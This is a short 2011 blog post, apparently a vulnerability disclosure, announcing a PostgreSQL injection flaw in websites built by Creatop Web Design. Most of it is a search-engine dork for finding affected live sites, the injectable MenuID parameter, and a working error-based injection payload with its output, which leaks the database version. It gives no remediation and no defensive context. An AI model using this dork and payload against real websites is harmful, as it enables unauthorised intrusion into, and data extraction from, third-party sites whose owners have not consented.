Tuesday, May 3, 2011

Creatop Web Design Vulnerable to PosgreSQL Injection


Title : Creatop Web Design Vulnerable to PosgreSQL Injection
Vendor: http://www.creatop.com.au/
Found : by p0pc0rn
Dork : intext:"by Creatop" filetype:cfm


PosgreSQL Injection
-------------------
http://www.victim.com/index.cfm?MenuID=[Injection]

Example:
http://www.victim.com/index.cfm?MenuID=80 and 1=cast(version() as int)
### ERROR: invalid input syntax for integer: "PostgreSQL 8.4.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit" ###



.:p0pc0rn:.
Share:

0 comments: